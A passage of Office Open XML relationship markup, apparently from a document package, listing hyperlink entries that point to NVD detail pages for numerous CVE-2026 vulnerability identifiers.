Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79907" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79908" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79909" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80075" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80161" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81353" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81386" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81388" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81396" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81397" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81398" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81947" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81948" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81949" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81950" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81951" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81953" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81954" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81956" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81957" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81959" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81960" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81973" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81975" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81976" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81979" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81980" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81981" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81983" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81985" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81986" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81987" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81988" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81989" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81990" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81992" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82005" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82006" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82007" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85983" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9034" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19397" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73315" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77909" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82537" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9040" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77110" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86073" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0860" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16025" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16037" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16497" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28604" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3174" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47625" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48888" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57098" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57099" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62759" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62813" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66304" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66307" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68887" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69329" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69378" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69428" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69429" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69443" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69587" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69588" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69607" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69631" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69710" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69739" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69744" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69760" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69793" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69805" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69809" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70570" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70579" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72923" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72932" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72943" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72949" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72954" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72989" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75998" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77101" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77102" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77103" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77104" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77108" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77898" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78837" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79377" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79378" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79572" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79575" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 